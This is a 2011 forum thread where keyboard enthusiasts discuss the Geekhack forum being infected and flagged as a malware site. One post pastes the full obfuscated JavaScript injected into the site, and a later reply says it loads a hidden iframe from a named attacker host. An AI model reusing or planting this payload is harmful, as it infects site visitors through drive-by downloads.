-
ripster
- Posts: 3809
- Joined: 09 Feb 2011, 07:04
- Location: Ugly American
- Main keyboard: As Long As It is Helvetica
- Main mouse: Mickey
- Favorite switch: Wanna Switch? Well, I Certainly Did!
- DT Pro Member: -
07 Nov 2011, 22:13
We're the friendliest customers in this world
We're modest - we have money
Yeah, I got the irony part. Geld. Money.
I got an A in High School German. Just ask all the German Deskthority members.
P.S. Don't you europeans close your quotes???? """""""""
-
guilleguillaume
- Posts: 519
- Joined: 12 Mar 2011, 09:40
- Location: Barcelona, Spain
- Main keyboard: Kmac Mini
- Main mouse: Razer Abyssus 2014
- Favorite switch: Topre
- DT Pro Member: -
09 Nov 2011, 02:45
Is the problem solved?
Firefox and IE9 still warn me about malware site.
-
itlnstln
- Posts: 692
- Joined: 03 Feb 2011, 19:57
- Location: San Antonio, TX
- Main keyboard: Noppoo Choc Mini
- Favorite switch: Cherry Brown
- DT Pro Member: -
09 Nov 2011, 14:50
According to iMav, he fixed the problem. Chrome is still flagging GH as malicious as well. I'm only going to access it by Tapatalk until the message goes away since I primarily post from work.
-
ripster
- Posts: 3809
- Joined: 09 Feb 2011, 07:04
- Location: Ugly American
- Main keyboard: As Long As It is Helvetica
- Main mouse: Mickey
- Favorite switch: Wanna Switch? Well, I Certainly Did!
- DT Pro Member: -
09 Nov 2011, 16:46
My Filco R Limited Edition Red Cherry MX had bugs yesterday.
Specifically an ant.
I'll host the pics here to please Sixty.
Alive
- FLA_3597-2.jpg (916.89 KiB) Viewed 7403 times
Dead
- FLA_3602.jpg (1014.16 KiB) Viewed 7403 times
-
ripster
- Posts: 3809
- Joined: 09 Feb 2011, 07:04
- Location: Ugly American
- Main keyboard: As Long As It is Helvetica
- Main mouse: Mickey
- Favorite switch: Wanna Switch? Well, I Certainly Did!
- DT Pro Member: -
10 Nov 2011, 17:46
So you guys really couldn't see my photos unless logged in???
BTW the warning message is gone.
-
webwit
- Wild Duck
- Posts: 9333
- Joined: 28 Jan 2011, 00:27
- Location: The Netherlands
- Main keyboard: Model F62
- Favorite switch: IBM beam spring
- DT Pro Member: 0000
-
Contact:
11 Nov 2011, 01:28
Still leaves
this problem (example) when not logged in there.
Scumbag geekhack...
-
ripster
- Posts: 3809
- Joined: 09 Feb 2011, 07:04
- Location: Ugly American
- Main keyboard: As Long As It is Helvetica
- Main mouse: Mickey
- Favorite switch: Wanna Switch? Well, I Certainly Did!
- DT Pro Member: -
11 Nov 2011, 19:43
Feel free to use my pictures in your wikis.
Just leave the watermark.
I call this one "Red Alert - Virus Attack"!
- FLA_3613.jpg (166.18 KiB) Viewed 7330 times
-
webwit
- Wild Duck
- Posts: 9333
- Joined: 28 Jan 2011, 00:27
- Location: The Netherlands
- Main keyboard: Model F62
- Favorite switch: IBM beam spring
- DT Pro Member: 0000
-
Contact:
12 Nov 2011, 00:37
ripster wrote:I call this one "Red Alert - Virus Attack"!
- FLA_3613.jpg (145.68 KiB) Viewed 7314 times
I like the orange guy.
-
ripster
- Posts: 3809
- Joined: 09 Feb 2011, 07:04
- Location: Ugly American
- Main keyboard: As Long As It is Helvetica
- Main mouse: Mickey
- Favorite switch: Wanna Switch? Well, I Certainly Did!
- DT Pro Member: -
23 Nov 2011, 18:38
Geekhack is infeasted
Happy Thanksgiving All!
Oh wait, some of you are Canadians.
Meanwhile at Geekhack......
- Geekhack 11-23-2011.png (44.14 KiB) Viewed 7246 times
Malware found on javascript file:
http://geekhack.org/clientscript/yui/co ... n.js?v=417
Known javascript malware.
Details:
http://sucuri.net/malware/malware-entry-mwjsanon7
a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g59.5g59.5g59.5g23g49.5g55.5g54.5g50.5g58g51g55.5g57g58.5g54.5g57.5g23g49.5g55.5g54.5g23.5g58.5g56g54g55.5g48.5g50g57.5g23.5g51.5g55.5g55.5g51.5g54g50.5g23g52g58g54.5g54g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g59.5g59.5g59.5g23g49.5g55.5g54.5g50.5g58g51g55.5g57g58.5g54.5g57.5g23g49.5g55.5g54.5g23.5g58.5g56g54g55.5g48.5g50g57.5g23.5g51.5g55.5g55.5g51.5g54g50.5g23g52g58g54.5g54g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.5g19.5g52g52.5g50g50g50.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx)
-
itlnstln
- Posts: 692
- Joined: 03 Feb 2011, 19:57
- Location: San Antonio, TX
- Main keyboard: Noppoo Choc Mini
- Favorite switch: Cherry Brown
- DT Pro Member: -
23 Nov 2011, 19:25
There's also some spambot running around in there asking for pics. At least Tapatalk is safe.
I think.
-
pita
- Posts: 45
- Joined: 07 Mar 2011, 10:44
- Location: USA
- Main keyboard: Leopold
- Main mouse: M570
- Favorite switch: Cherry Brown
- DT Pro Member: -
23 Nov 2011, 19:40
I don't get the warning virus warning, but I am not able to post anything..
-
Daemon Raccoon
- Posts: 145
- Joined: 09 Mar 2011, 22:08
- Location: Flyover Country, United States
- Main keyboard: Model M SSK 1391472
- Main mouse: CST2545W-RC LTrac
- Favorite switch: Buckling Spring
- DT Pro Member: -
23 Nov 2011, 19:50
pita wrote:I don't get the warning virus warning, but I am not able to post anything..
If you disable Javascript for Geekhack you can post.
-
Ascaii
- The Beard
- Posts: 1524
- Joined: 30 Jan 2011, 12:04
- Location: Berlin, Germany
- Main keyboard: CM Novatouch, g80-1851
- Main mouse: Corsair M65
- Favorite switch: Ergo clears, Topre
- DT Pro Member: 0019
24 Nov 2011, 11:39
got a new trojan warning yesterday, seems whatever the issue is is NOT resolved. Google now notes the last malware find as 2011-11-23
-
zulios
- Posts: 192
- Joined: 06 Sep 2011, 14:18
- Location: France
- Main keyboard: Tipro matrix (mx black) USB
- Main mouse: Kensington slimblade / Microsoft SideWinder X5
- Favorite switch: Ergo clears / MX black
- DT Pro Member: -
24 Nov 2011, 12:51
I've had trouble with this : was browsing on geekhack. Suddenly firefox crashed, and a soft ironically called "privacy protection" appeared from nowhere, disabling my anti virus and trying to scan my pc. Fortunately I've gotten rid of it pretty quickly, but for a non experienced user it has a very similar look to any serious windows application.
Don't know what it does precisely though, but it said my pc was infected with blaster worm and started a scan it. It looks like it tries to protect you when actually I believe it rather tries to steal your data. That's some pretty good job in trying to lure the user.
Last edited by
zulios on 24 Nov 2011, 13:11, edited 1 time in total.
-
Brian8bit
- Posts: 240
- Joined: 01 Feb 2011, 08:00
- DT Pro Member: -
24 Nov 2011, 13:09
Is it a vulnerability in vBulletin that has yet to be patched that people are exploiting? Or is it someone using a dodgy signature? Another forum I use with vBulletin occasionally gets malware warnings, but in every instance it has been someones signature...
-
Ascaii
- The Beard
- Posts: 1524
- Joined: 30 Jan 2011, 12:04
- Location: Berlin, Germany
- Main keyboard: CM Novatouch, g80-1851
- Main mouse: Corsair M65
- Favorite switch: Ergo clears, Topre
- DT Pro Member: 0019
24 Nov 2011, 15:19
Imav said it was a vulnerability last time, but supposedly it was fixed...if it was then it shouldnt be fucked up again...but it is, so all bets are off in my eyes.
-
Gerk
- Posts: 35
- Joined: 10 Sep 2011, 08:08
- Location: Toronto, ON, Canada
- Main keyboard: Kinesis Freestyle Pro
- Main mouse: Logitech G700s
- Favorite switch: Cherry MX Browns
- DT Pro Member: -
24 Nov 2011, 18:13
It's seriously messed up at the moment, can't even load pages, instead getting the generic VB warning message that headers were already sent ... then it sends my browser(s) into a headspin that require a force quit. This is the first time any of the problems have caused me grief on OSX. It's also a time when I find Lion's "feature" for re-opening all of your Safari tabs after a quit (or force quit) incredibly annoying.
When iMac said it was "fixed" I think he was just referring to the injected js, not the actual exploit or whatever they used to get in with. If it is someone's sig then it's still using an exploit/loophole because there should be no js in sigs.
-
7bit
- Posts: 11435
- Joined: 01 Feb 2011, 00:37
- Location: Berlin, DE
- Main keyboard: Tipro / IBM 3270 emulator
- Main mouse: Logitech granite for SGI
- Favorite switch: MX Lock
- DT Pro Member: 0001
24 Nov 2011, 18:37
I remember GeekHack was a great website (with some technical issues fron time to time), but long gone.
I wonder what iMav does these days since he'd given up his website.
Last edited by
7bit on 24 Nov 2011, 20:28, edited 1 time in total.
-
mintberryminuscrunch
- Posts: 1225
- Joined: 29 Apr 2011, 12:58
- Location: Germany
- DT Pro Member: -
24 Nov 2011, 18:58
7bit wrote:
I wonder what iMav does these days since he'd given up his website.
as long as he doesn't spam adds on the website there is still hope
-
litster
- Posts: 716
- Joined: 23 Jun 2011, 07:28
- Location: Washington State, USA
- Main keyboard: KMAC2, The Cheat
- Favorite switch: Brown, Topre, Red, BS
- DT Pro Member: -
24 Nov 2011, 19:13
Before, I wondered, ah, the good old days when every keyboard nut was under one roof, on the same forum. Now I am thankful that there are two forums. Or this Thanksgiving holiday would be pretty boring
Fault tolerance FTW!
iMav said he is on the road this long weekend. I guess it will be a while before this fixed. Even if vB was patched, there maybe other security holes in the OS, browser, or other software on the box that is accessible through open ports for repeat infections.
-
pita
- Posts: 45
- Joined: 07 Mar 2011, 10:44
- Location: USA
- Main keyboard: Leopold
- Main mouse: M570
- Favorite switch: Cherry Brown
- DT Pro Member: -
24 Nov 2011, 19:17
What a mess at GH...
-
webwit
- Wild Duck
- Posts: 9333
- Joined: 28 Jan 2011, 00:27
- Location: The Netherlands
- Main keyboard: Model F62
- Favorite switch: IBM beam spring
- DT Pro Member: 0000
-
Contact:
24 Nov 2011, 19:25
What is sent is this:
Oooh, an obfuscated javascript. Meh, I decode it and find this:
In other words, it tries to insert a hidden iframe from http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254, which is where the attack is coming from.
-
ripster
- Posts: 3809
- Joined: 09 Feb 2011, 07:04
- Location: Ugly American
- Main keyboard: As Long As It is Helvetica
- Main mouse: Mickey
- Favorite switch: Wanna Switch? Well, I Certainly Did!
- DT Pro Member: -
24 Nov 2011, 19:26
Come to the dark side.
We HAVE cookies.
For you Euro/Canadian folks this is what Thanksgiving Day is like in the great U.S.A.:
Piggly Wiggly is 6 degrees from Kevin Bacon.
-
Gerk
- Posts: 35
- Joined: 10 Sep 2011, 08:08
- Location: Toronto, ON, Canada
- Main keyboard: Kinesis Freestyle Pro
- Main mouse: Logitech G700s
- Favorite switch: Cherry MX Browns
- DT Pro Member: -
24 Nov 2011, 21:23
I was just going to post this. They might have been more successful had they not tried to inject it where they did. Someone has labelled GH as a target, probably all over the hacker boards in their lists. Might be a while before they sort it I'm guessing. I think iMav keeps fixing the injected code but hasn't addressed the root of the issue.
Funny enough it still works fine with tapatalk, but traffic is pretty low today LOL
-
pita
- Posts: 45
- Joined: 07 Mar 2011, 10:44
- Location: USA
- Main keyboard: Leopold
- Main mouse: M570
- Favorite switch: Cherry Brown
- DT Pro Member: -
24 Nov 2011, 22:40
Gerk wrote:
..., but traffic is pretty low today LOL
Well DUH!? lol.
-
Gerk
- Posts: 35
- Joined: 10 Sep 2011, 08:08
- Location: Toronto, ON, Canada
- Main keyboard: Kinesis Freestyle Pro
- Main mouse: Logitech G700s
- Favorite switch: Cherry MX Browns
- DT Pro Member: -
24 Nov 2011, 22:42
pita wrote:Gerk wrote:
..., but traffic is pretty low today LOL
Well DUH!? lol.
Just stating that only a few of us tapatalk users are the ones getting anywhere
-
webwit
- Wild Duck
- Posts: 9333
- Joined: 28 Jan 2011, 00:27
- Location: The Netherlands
- Main keyboard: Model F62
- Favorite switch: IBM beam spring
- DT Pro Member: 0000
-
Contact:
-
Gerk
- Posts: 35
- Joined: 10 Sep 2011, 08:08
- Location: Toronto, ON, Canada
- Main keyboard: Kinesis Freestyle Pro
- Main mouse: Logitech G700s
- Favorite switch: Cherry MX Browns
- DT Pro Member: -
-
ripster
- Posts: 3809
- Joined: 09 Feb 2011, 07:04
- Location: Ugly American
- Main keyboard: As Long As It is Helvetica
- Main mouse: Mickey
- Favorite switch: Wanna Switch? Well, I Certainly Did!
- DT Pro Member: -
25 Nov 2011, 17:43
I think it's been fixed.
BUT I've said that before......
Report 2011-04-05 03:24:45 (GMT 1)
Website geekhack.org
Domain Hash 0db414050bd8f4be630b38e87d120354
IP Address 65.111.241.205 [SCAN]
IP Hostname runt-3.uhhh.org
IP Country US (United States)
AS Number 30691
AS Name LLDC - Lifeline Data Centers
Detections 0 / 21 (0 %)
Status CLEAN
Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender CLEAN
Scanning site with: DNS-BH CLEAN
Scanning site with: DShield SDL CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts UNRATED
Scanning site with: joewein.de LLC CLEAN
Scanning site with: Malware Domain List CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MyWOT CLEAN
Scanning site with: Norton SafeWeb CLEAN
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SCUMWARE CLEAN
Scanning site with: SpamhausDBL CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN
Alors on danse.